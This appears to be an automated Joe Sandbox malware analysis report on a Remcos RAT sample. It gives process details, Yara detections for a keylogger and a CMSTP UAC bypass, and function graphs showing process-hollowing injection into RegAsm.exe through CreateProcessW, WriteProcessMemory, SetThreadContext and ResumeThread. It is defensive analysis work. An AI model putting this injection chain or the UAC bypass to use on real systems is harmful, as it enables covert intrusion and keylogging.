                                                Imagebase:0x1310000
                                                File size:427'008 bytes
                                                MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:9
                                                Start time:14:22:24
                                                Start date:11/09/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                Imagebase:0xc30000
                                                File size:64'704 bytes
                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.906391209.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                Reputation:high
                                                Has exited:false

                                                Disassembly

                                                Reset < >

                                                  Executed Functions

                                                  Function 0019D01D Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.401335158.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_19d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 139a7876cb9d885c544b853d6970cf9dca0c133f71b8c7b6fbe84bf191369d62
                                                  • Instruction ID: 29f26500aa0dcce1b7585f73bbcbccbfdc3f2b70df169bc7e1144c840a3d7d2f
                                                  • Opcode Fuzzy Hash: 139a7876cb9d885c544b853d6970cf9dca0c133f71b8c7b6fbe84bf191369d62
                                                  • Instruction Fuzzy Hash: 58018F71504340ABEB104A26ECC4B67FF98EB41764F2C855AFC495B286C37A9845CAB2
                                                  Function 0019D01C Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.401335158.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_19d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1f24c7f7273565d744ded1c97ea820b4fb60c618d8a7ecf2198649ae68ac584e
                                                  • Instruction ID: b5b563aafb47aefeec695138cf6847fcdcf20ccd993caaa9e70c1e428ccaaef8
                                                  • Opcode Fuzzy Hash: 1f24c7f7273565d744ded1c97ea820b4fb60c618d8a7ecf2198649ae68ac584e
                                                  • Instruction Fuzzy Hash: B2F06271504344AFEB108E16DCC4B66FFA8EB41724F18C55AFD585A296C37A9C44CAB1

                                                  Execution Graph

                                                  Execution Coverage:11%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:65.2%
                                                  Total number of Nodes:23
                                                  Total number of Limit Nodes:2
                                                  execution_graph 3608 254b48 3609 254b6f 3608->3609 3612 254c98 3609->3612 3613 254cc2 3612->3613 3614 254c84 3613->3614 3616 254d60 3613->3616 3618 254d93 3616->3618 3632 25172c 3618->3632 3619 254f5c 3620 251738 Wow64SetThreadContext 3619->3620 3621 25505b 3619->3621 3620->3621 3622 251774 WriteProcessMemory 3621->3622 3625 255384 3622->3625 3623 255623 3624 251774 WriteProcessMemory 3623->3624 3626 255674 3624->3626 3625->3623 3628 251774 WriteProcessMemory 3625->3628 3627 251780 Wow64SetThreadContext 3626->3627 3629 255777 3626->3629 3627->3629 3628->3625 3630 251798 ResumeThread 3629->3630 3631 255829 3630->3631 3631->3613 3633 255938 CreateProcessW 3632->3633 3635 255b2c 3633->3635

                                                  Executed Functions

                                                  Function 00254D60 Relevance: .7, Instructions: 658COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 355 254d60-254d91 356 254d93 355->356 357 254d98-254ece 355->357 356->357 362 254ed5-254f0a 357->362 363 254ed0 357->363 365 254f37-254f7c call 25172c 362->365 366 254f0c-254f36 362->366 363->362 370 254fa5-254fcb 365->370 371 254f7e-254f9a 365->371 366->365 374 254fd2-255014 370->374 375 254fcd 370->375 371->370 379 255016 374->379 380 25501b-255047 374->380 375->374 379->380 382 255049-25507b call 251738 380->382 383 2550a8-2550d9 call 251744 380->383 390 2550a4-2550a6 382->390 391 25507d-255099 382->391 388 255102-25510c 383->388 389 2550db-2550f7 383->389 392 255113-255136 388->392 393 25510e 388->393 389->388 390->388 391->390 396 25513d-255181 call 251750 392->396 397 255138 392->397 393->392 402 255183-25519f 396->402 403 2551aa-2551b3 396->403 397->396 402->403 404 2551b5-2551dd call 25175c 403->404 405 2551df-2551e1 403->405 408 2551e7-2551fb 404->408 405->408 410 255224-25522e 408->410 411 2551fd-255219 408->411 412 255235-255259 410->412 413 255230 410->413 411->410 418 255260-2552b2 call 251768 412->418 419 25525b 412->419 413->412 423 2552b4-2552c8 418->423 424 2552ca-2552cc 418->424 419->418 425 2552d2-2552e6 423->425 424->425 426 255323-25533d 425->426 427 2552e8-255322 call 251768 425->427 429 255366-2553a4 call 251774 426->429 430 25533f-25535b 426->430 427->426 435 2553a6-2553c2 429->435 436 2553cd-2553d7 429->436 430->429 435->436 437 2553de-2553ee 436->437 438 2553d9 436->438 441 2553f5-25541d 437->441 442 2553f0 437->442 438->437 445 255424-255433 441->445 446 25541f 441->446 442->441 447 2555fe-25561d 445->447 446->445 448 255623-25564a 447->448 449 255438-255446 447->449 453 255651-255694 call 251774 448->453 454 25564c 448->454 450 25544d-255474 449->450 451 255448 449->451 457 255476 450->457 458 25547b-2554a2 450->458 451->450 460 255696-2556b2 453->460 461 2556bd-2556c7 453->461 454->453 457->458 465 2554a4 458->465 466 2554a9-2554dd 458->466 460->461 463 2556ce-2556fb 461->463 464 2556c9 461->464 472 2556fd-255707 463->472 473 255708-255714 463->473 464->463 465->466 470 2554e3-2554f1 466->470 471 2555c9-2555d6 466->471 475 2554f3 470->475 476 2554f8-2554ff 470->476 479 2555dd-2555f1 471->479 480 2555d8 471->480 472->473 477 255716 473->477 478 25571b-25572b 473->478 475->476 481 255506-25554e 476->481 482 255501 476->482 477->478 483 255732-255763 478->483 484 25572d 478->484 485 2555f3 479->485 486 2555f8 479->486 480->479 496 255555-25557a call 251774 481->496 497 255550 481->497 482->481 489 255765-255772 call 251780 483->489 490 2557c4-2557f5 call 25178c 483->490 484->483 485->486 486->447 494 255777-255797 489->494 501 2557f7-255813 490->501 502 25581e-255824 call 251798 490->502 499 2557c0-2557c2 494->499 500 255799-2557b5 494->500 503 25557f-25559f 496->503 497->496 499->502 500->499 501->502 508 255829-255849 502->508 505 2555a1-2555bd 503->505 506 2555c8 503->506 505->506 506->471 510 255872-255915 508->510 511 25584b-255867 508->511 511->510
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.397934199.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ContextMemoryProcessThreadWow64Write
                                                  • String ID:
                                                  • API String ID: 3696009080-0
                                                  • Opcode ID: 25d0b759440d500678dee06db2fdcd919e67f637594868ad9b7867d25f5b3f56
                                                  • Instruction ID: afbe9d04ba2f696211c378ff4b8f3d270f11154df05012a5ff2f5acca9b00e70
                                                  • Opcode Fuzzy Hash: 25d0b759440d500678dee06db2fdcd919e67f637594868ad9b7867d25f5b3f56
                                                  • Instruction Fuzzy Hash: CA62E174D112288FEB64DF25C895BDDBBB2BB89301F5080EA980DA7291DB345E85CF54
                                                  Function 0070203C Relevance: 8.8, Strings: 6, Instructions: 1317COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 70203c-70203f 1 702041-702043 0->1 2 702045-70204d 0->2 1->2 3 702065-702069 2->3 4 70204f-702053 2->4 7 702194-70219e 3->7 8 70206f-702073 3->8 5 702055 4->5 6 702059-702063 4->6 5->6 9 702057 5->9 6->3 10 7021a0-7021a9 7->10 11 7021ac-7021b2 7->11 12 7020b3 8->12 13 702075-702086 8->13 9->3 16 7021b4-7021b6 11->16 17 7021b8-7021c4 11->17 14 7020b5-7020b7 12->14 21 7021ec-70223b 13->21 22 70208c-702091 13->22 14->7 19 7020bd-7020c1 14->19 18 7021c6-7021e9 16->18 17->18 19->7 24 7020c7-7020cb 19->24 33 702241-702246 21->33 34 70243e-70244d 21->34 25 702093-702099 22->25 26 7020a9-7020b1 22->26 24->7 28 7020d1-7020f7 24->28 29 70209b 25->29 30 70209d-7020a7 25->30 26->14 28->7 45 7020fd-702101 28->45 29->26 30->26 37 702248-70224e 33->37 38 70225e-702262 33->38 42 702250 37->42 43 702252-70225c 37->43 40 7023e7-7023f1 38->40 41 702268-70226a 38->41 48 7023f3-7023fa 40->48 49 7023fd-702403 40->49 46 70227a 41->46 47 70226c-702278 41->47 42->38 43->38 51 702103-70210c 45->51 52 702124 45->52 53 70227c-70227e 46->53 47->53 54 702405-702407 49->54 55 702409-702415 49->55 56 702113-702120 51->56 57 70210e-702111 51->57 59 702127-702134 52->59 53->40 58 702284-7022a3 53->58 60 702417-70243b 54->60 55->60 61 702122 56->61 57->61 70 7022b3 58->70 71 7022a5-7022b1 58->71 65 70213a-702191 59->65 61->59 72 7022b5-7022b7 70->72 71->72 72->40 73 7022bd-7022c1 72->73 73->40 74 7022c7-7022cb 73->74 75 7022cd-7022dc 74->75 76 7022de 74->76 77 7022e0-7022e2 75->77 76->77 77->40 78 7022e8-7022ec 77->78 78->40 79 7022f2-702311 78->79 82 702313-702319 79->82 83 702329-702334 79->83 84 70231b 82->84 85 70231d-70231f 82->85 86 702343-70235f 83->86 87 702336-702339 83->87 84->83 85->83 88 702361-702374 86->88 89 70237c-702386 86->89 87->86 88->89 90 702388 89->90 91 70238a-7023d8 89->91 92 7023dd-7023e4 90->92 91->92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.398042053.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_700000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: L4#p$L4#p$L4#p$X4$X4$d=1
                                                  • API String ID: 0-3261895890
                                                  • Opcode ID: d6b8f4aab0bd3ff9439d69c3417e029ca1a55c26b8cbcda993aaf9f12f50c38a
                                                  • Instruction ID: 609bf195f0f4cc0aeae353959137a8ad373c97bbb8e7721fbdfb608fa748a9d0
                                                  • Opcode Fuzzy Hash: d6b8f4aab0bd3ff9439d69c3417e029ca1a55c26b8cbcda993aaf9f12f50c38a
                                                  • Instruction Fuzzy Hash: 87B11532704348DFDF158F64C8487AEBBE2AF85310F2485AAE5119B2D2DB79DC46CB52
                                                  Function 00700B98 Relevance: 5.5, Strings: 4, Instructions: 482COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 99 700b98-700bbb 100 700bc1-700bc6 99->100 101 700d96-700ddb 99->101 102 700bc8-700bce 100->102 103 700bde-700be2 100->103 111 700de1-700de6 101->111 112 700f32-700f4c 101->112 107 700bd0 102->107 108 700bd2-700bdc 102->108 104 700d43-700d4d 103->104 105 700be8-700bec 103->105 113 700d5b-700d61 104->113 114 700d4f-700d58 104->114 109 700bee-700bfd 105->109 110 700bff 105->110 107->103 108->103 115 700c01-700c03 109->115 110->115 116 700de8-700dee 111->116 117 700dfe-700e02 111->117 138 700f5e-700f7e 112->138 139 700f4e-700f5d 112->139 119 700d63-700d65 113->119 120 700d67-700d73 113->120 115->104 124 700c09-700c29 115->124 126 700df0 116->126 127 700df2-700dfc 116->127 122 700e08-700e0a 117->122 123 700edf-700ee9 117->123 121 700d75-700d93 119->121 120->121 129 700e1a 122->129 130 700e0c-700e18 122->130 132 700ef7-700efd 123->132 133 700eeb-700ef4 123->133 156 700c48 124->156 157 700c2b-700c46 124->157 126->117 127->117 135 700e1c-700e1e 129->135 130->135 140 700f03-700f0f 132->140 141 700eff-700f01 132->141 135->123 142 700e24-700e28 135->142 143 700f84-700f89 138->143 144 7010eb-70111d 138->144 139->138 145 700f11-700f2f 140->145 141->145 146 700e48 142->146 147 700e2a-700e46 142->147 150 700fa1-700fa5 143->150 151 700f8b-700f91 143->151 165 70112d 144->165 166 70111f-70112b 144->166 159 700e4a-700e4c 146->159 147->159 154 70109a-7010a4 150->154 155 700fab-700fad 150->155 160 700f93 151->160 161 700f95-700f9f 151->161 167 7010b2-7010b8 154->167 168 7010a6-7010af 154->168 162 700fbd 155->162 163 700faf-700fbb 155->163 170 700c4a-700c4c 156->170 157->170 159->123 169 700e52-700e65 159->169 160->150 161->150 174 700fbf-700fc1 162->174 163->174 176 70112f-701131 165->176 166->176 177 7010ba-7010bc 167->177 178 7010be-7010ca 167->178 196 700e6b-700e6d 169->196 170->104 171 700c52-700c54 170->171 181 700c64 171->181 182 700c56-700c62 171->182 174->154 183 700fc7-700fc9 174->183 185 701133-701139 176->185 186 70117d-701187 176->186 179 7010cc-7010e8 177->179 178->179 189 700c66-700c68 181->189 182->189 191 700fd9 183->191 192 700fcb-700fd7 183->192 187 701147-701164 185->187 188 70113b-70113d 185->188 193 701192-701198 186->193 194 701189-70118f 186->194 209 701166-701177 187->209 210 7011ca-7011cf 187->210 188->187 189->104 199 700c6e-700c8e 189->199 201 700fdb-700fdd 191->201 192->201 197 70119a-70119c 193->197 198 70119e-7011aa 193->198 202 700e85-700edc 196->202 203 700e6f-700e75 196->203 205 7011ac-7011c7 197->205 198->205 227 700c90-700c96 199->227 228 700ca6-700caa 199->228 201->154 206 700fe3-700fe5 201->206 207 700e77 203->207 208 700e79-700e7b 203->208 215 700fe7-700fed 206->215 216 700fff-701003 206->216 207->202 208->202 209->186 210->209 220 700ff1-700ffd 215->220 221 700fef 215->221 217 701005-70100b 216->217 218 70101d-701097 216->218 222 70100d 217->222 223 70100f-70101b 217->223 220->216 221->216 222->218 223->218 232 700c98 227->232 233 700c9a-700c9c 227->233 234 700cc4-700cc8 228->234 235 700cac-700cb2 228->235 232->228 233->228 239 700ccf-700cd1 234->239 237 700cb4 235->237 238 700cb6-700cc2 235->238 237->234 238->234 242 700cd3-700cd9 239->242 243 700ce9-700d40 239->243 244 700cdb 242->244 245 700cdd-700cdf 242->245 244->243 245->243
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.398042053.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_700000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8#;f$8#;f$l;1$l;1
                                                  • API String ID: 0-1332205951
                                                  • Opcode ID: 4a3e204ffc849452dfc0f290e9ba13a8a3fa8c0c04fd1ce4de019167c37b4cda
                                                  • Instruction ID: 77cf0456212511637e7ff7d1e4bf769f427b80c6bb188c6462925ca5668fc183
                                                  • Opcode Fuzzy Hash: 4a3e204ffc849452dfc0f290e9ba13a8a3fa8c0c04fd1ce4de019167c37b4cda
                                                  • Instruction Fuzzy Hash: 72F12531B04301CFDB259A79C8107BABBE2AF91320F2486BAD555DB2C1DB79DC41C7A2
                                                  Function 0025162F Relevance: 1.8, APIs: 1, Instructions: 345COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 247 25162f-251633 248 251635-251638 247->248 249 2516a8-2516ae 247->249 248->249 250 2516b0-2516b7 249->250 251 251723-251727 249->251 250->251 252 25179c 251->252 253 251729-2559c3 251->253 255 2517a2-2517d0 252->255 256 2559c5-2559d7 253->256 257 2559da-2559e8 253->257 267 2517d2-251861 255->267 256->257 258 2559ff-255a3b 257->258 259 2559ea-2559fc 257->259 261 255a3d-255a4c 258->261 262 255a4f-255b2a CreateProcessW 258->262 259->258 261->262 270 255b33-255bfc 262->270 271 255b2c-255b32 262->271 275 251867-251880 267->275 285 255c32-255c3d 270->285 286 255bfe-255c27 270->286 271->270 278 251882-251883 275->278 279 25180b-251861 275->279 279->275 290 255c3e 285->290 286->285 290->290
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.397934199.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 10960584fdc79ac5c6531557d79ccb681f1186bd7e06a39e38518a3f67d8a3b4
                                                  • Instruction ID: 17e0831e302eb3d27ab087b06cc36757d18fb3a785fcc067cd86259b1c0d5465
                                                  • Opcode Fuzzy Hash: 10960584fdc79ac5c6531557d79ccb681f1186bd7e06a39e38518a3f67d8a3b4
                                                  • Instruction Fuzzy Hash: BEB14A71C093A98FDB22CF64C850BDDBBB0AF06304F0590E6D548AB262D7345E99CF55
                                                  Function 0025172C Relevance: 1.7, APIs: 1, Instructions: 239processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 291 25172c-2559c3 293 2559c5-2559d7 291->293 294 2559da-2559e8 291->294 293->294 295 2559ff-255a3b 294->295 296 2559ea-2559fc 294->296 297 255a3d-255a4c 295->297 298 255a4f-255b2a CreateProcessW 295->298 296->295 297->298 302 255b33-255bfc 298->302 303 255b2c-255b32 298->303 312 255c32-255c3d 302->312 313 255bfe-255c27 302->313 303->302 317 255c3e 312->317 313->312 317->317
                                                  APIs
                                                  • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00255B17
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.397934199.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 3160190bff211dd433d87f6bd9f07e6fc41af37c0df14daae7e4dcffffc17959
                                                  • Instruction ID: db7a6055d60b61a278e18d0c38c78c6b095d14ca5a5beef0664c71952c6a9682
                                                  • Opcode Fuzzy Hash: 3160190bff211dd433d87f6bd9f07e6fc41af37c0df14daae7e4dcffffc17959
                                                  • Instruction Fuzzy Hash: E781C275D0022D9FDF25CFA5C940BDDBBB1AB09304F0090AAE549B7210DB749E99CF94
                                                  Function 00251774 Relevance: 1.6, APIs: 1, Instructions: 113injectionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 318 251774-256007 320 25601e-25607e WriteProcessMemory 318->320 321 256009-25601b 318->321 322 256087-2560c5 320->322 323 256080-256086 320->323 321->320 323->322
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025606E
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.397934199.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: edf1c3bfe3a9a8c20bda0565bf6e44e533af7965d720b58625932d9c28d17d8b
                                                  • Instruction ID: 34c3e4387b5cb3073963dd23266bdfaf33c94f0bce68a82b36b7cda3f959977b
                                                  • Opcode Fuzzy Hash: edf1c3bfe3a9a8c20bda0565bf6e44e533af7965d720b58625932d9c28d17d8b
                                                  • Instruction Fuzzy Hash: E9417BB5D142589FCF10CFA9D984ADEFBF1BB09310F24902AE818B7250D375AA55CB58
                                                  Function 00251738 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 326 251738-255ccc 328 255ce3-255d2a Wow64SetThreadContext 326->328 329 255cce-255ce0 326->329 330 255d33-255d6b 328->330 331 255d2c-255d32 328->331 329->328 331->330
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 00255D1A
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.397934199.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: c0ddc06f599fc55466561b079eb1de0ff2f96d8759f04825b94a8ff355d7d9cf
                                                  • Instruction ID: 47773124d1b143c3929a7eecd5750ee6df46aed3dcfdb81b0d86d13609990a2c
                                                  • Opcode Fuzzy Hash: c0ddc06f599fc55466561b079eb1de0ff2f96d8759f04825b94a8ff355d7d9cf
                                                  • Instruction Fuzzy Hash: 27318BB5D116589FCB10CFAAD984ADEBBF1AB49314F24802AE814B7310D378A949CF58
                                                  Function 00251780 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 334 251780-255ccc 336 255ce3-255d2a Wow64SetThreadContext 334->336 337 255cce-255ce0 334->337 338 255d33-255d6b 336->338 339 255d2c-255d32 336->339 337->336 339->338
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 00255D1A
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.397934199.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: c099c267d55bb2ff1d349f3d3cd1285f47e0f19d92331e96c2a4a80c8202e12d
                                                  • Instruction ID: b839788953ce52181ca90c47d3c0d1bd4d49b2f5d7bd46b494288517ead2eeae
                                                  • Opcode Fuzzy Hash: c099c267d55bb2ff1d349f3d3cd1285f47e0f19d92331e96c2a4a80c8202e12d
                                                  • Instruction Fuzzy Hash: 79318CB5D116589FCB10CFA9D584ADEBBF1AB49314F24802AE818B7210D374A949CF94
                                                  Function 00255C69 Relevance: 1.6, APIs: 1, Instructions: 90threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 342 255c69-255ccc 343 255ce3-255d2a Wow64SetThreadContext 342->343 344 255cce-255ce0 342->344 345 255d33-255d6b 343->345 346 255d2c-255d32 343->346 344->343 346->345
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 00255D1A
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.397934199.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 0916e2601e0b533d347f6641340c7de7649f59bcd8682e4d343bc19cfdd0da00
                                                  • Instruction ID: 500254f95e62a2d79c4b2684c98e8b741c76195df1bb9b241aa56bb5ea704885
                                                  • Opcode Fuzzy Hash: 0916e2601e0b533d347f6641340c7de7649f59bcd8682e4d343bc19cfdd0da00
                                                  • Instruction Fuzzy Hash: 27319AB5D112589FCB10CFAAD984ADEFBF1BB49314F24802AE818B7250D378A949CF54
                                                  Function 00251798 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 349 251798-256166 ResumeThread 351 25616f-25619d 349->351 352 256168-25616e 349->352 352->351
                                                  APIs
                                                  • ResumeThread.KERNELBASE(?), ref: 00256156
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.397934199.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: b4968c31f56c1cddc3ce02c5e223c9740c27c5dc7f7f5d8eb1e21994dd15c27e
                                                  • Instruction ID: 9fe90367de426dba42b0a57af4151ac666d047f60e87f233ae6c14088fdd5c84
                                                  • Opcode Fuzzy Hash: b4968c31f56c1cddc3ce02c5e223c9740c27c5dc7f7f5d8eb1e21994dd15c27e
                                                  • Instruction Fuzzy Hash: CC21AEB9D106189FCB10CF99D484ADEFBF4EB09310F20905AE818B7310D375A945CFA9
                                                  Function 00701730 Relevance: .1, Instructions: 126COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 521 701730-701733 522 701735-701737 521->522 523 701739-701741 521->523 522->523 524 701743-701747 523->524 525 701759-70175d 523->525 528 701749 524->528 529 70174d-701757 524->529 526 701763-701765 525->526 527 70188e-701898 525->527 531 701775 526->531 532 701767-701773 526->532 533 7018a6-7018ac 527->533 534 70189a-7018a3 527->534 528->529 530 70174b 528->530 529->525 530->525 536 701777-701779 531->536 532->536 537 7018b2-7018be 533->537 538 7018ae-7018b0 533->538 536->527 539 70177f-701783 536->539 540 7018c0-7018df 537->540 538->540 541 701785-701794 539->541 542 701796 539->542 544 701798-70179a 541->544 542->544 544->527 546 7017a0-7017a2 544->546 548 7017b2 546->548 549 7017a4-7017b0 546->549 550 7017b4-7017b6 548->550 549->550 550->527 551 7017bc-7017be 550->551 552 7017c0-7017c6 551->552 553 7017d8-7017e3 551->553 554 7017c8 552->554 555 7017ca-7017d6 552->555 556 7017f2-7017fe 553->556 557 7017e5-7017e8 553->557 554->553 555->553 558 701800-701802 556->558 559 70180c-701813 556->559 557->556 558->559 561 70181a-70181c 559->561 562 701834-70188b 561->562 563 70181e-701824 561->563 564 701826 563->564 565 701828-70182a 563->565 564->562 565->562
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.398042053.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_700000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e6e4908244b4748ec556dccba2d58ee11f4ce84379a08788bedadffe6048aaf9
                                                  • Instruction ID: 76bff930fc3ace86f4c6b4da8c3d28c53376f686335ae3872659e4042bbdaa44
                                                  • Opcode Fuzzy Hash: e6e4908244b4748ec556dccba2d58ee11f4ce84379a08788bedadffe6048aaf9
                                                  • Instruction Fuzzy Hash: 00412635704201DBDB298E68D4402BAB7E2AF91321BB887BBD8518B3D1DBBDCD41C752
                                                  Function 00700DB8 Relevance: .1, Instructions: 65COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
